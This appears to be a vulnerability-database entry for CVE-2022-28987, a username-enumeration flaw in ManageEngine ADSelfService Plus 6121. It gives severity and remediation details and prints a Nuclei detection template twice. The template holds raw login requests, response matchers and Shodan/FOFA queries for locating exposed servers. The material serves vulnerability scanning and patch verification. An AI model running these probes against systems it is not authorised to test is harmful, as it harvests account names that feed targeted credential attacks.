Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration

CVE-2022-28987

Verified

Description

Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.

Severity

Medium

CVSS Score

5.3

Exploit Probability

11%

Published Date

January 29, 2026

Template Author

ritikchaddha

CVE-2022-28987.yaml

id: CVE-2022-28987

info:
  name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration
  author: ritikchaddha
  severity: medium
  description: |
    Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.
  impact: |
    Attackers can enumerate valid usernames, aiding targeted attacks or account harvesting.
  remediation: |
    Update to version 6202 or later.
  reference:
    - https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28987
    epss-score: 0.11168
    epss-percentile: 0.93591
    cwe-id: CWE-203
  metadata:
    max-request: 2
    verified: false
    shodan-query: http.title:"ADSelfService Plus"
    fofa-query: title="ADSelfService Plus"
  tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice,vkev

http:
  - raw:
      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=asdfnonexistent

      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=Guest

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Permission Denied")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Your account has been disabled")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100cdc006248bb863fc40a069ef3d292e8b062918e75fdeb45e2e51f5e9e6e07dad0220780bef419df2a48467358d56ff283037456179335568d60940ff6ad7e4208ac9:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID:

cve-2022-28987

CWE ID:

cwe-203

References

https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md https://nvd.nist.gov/vuln/detail/CVE-2022-28987

Remediation Steps

Update to version 6202 or later.

id: CVE-2022-28987

info:
  name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration
  author: ritikchaddha
  severity: medium
  description: |
    Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.
  impact: |
    Attackers can enumerate valid usernames, aiding targeted attacks or account harvesting.
  remediation: |
    Update to version 6202 or later.
  reference:
    - https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28987
    epss-score: 0.11168
    epss-percentile: 0.93591
    cwe-id: CWE-203
  metadata:
    max-request: 2
    verified: false
    shodan-query: http.title:"ADSelfService Plus"
    fofa-query: title="ADSelfService Plus"
  tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice,vkev

http:
  - raw:
      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=asdfnonexistent

      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=Guest

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Permission Denied")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Your account has been disabled")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100cdc006248bb863fc40a069ef3d292e8b062918e75fdeb45e2e51f5e9e6e07dad0220780bef419df2a48467358d56ff283037456179335568d60940ff6ad7e4208ac9:922c64590222798bb761d5b6d8e72950

Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps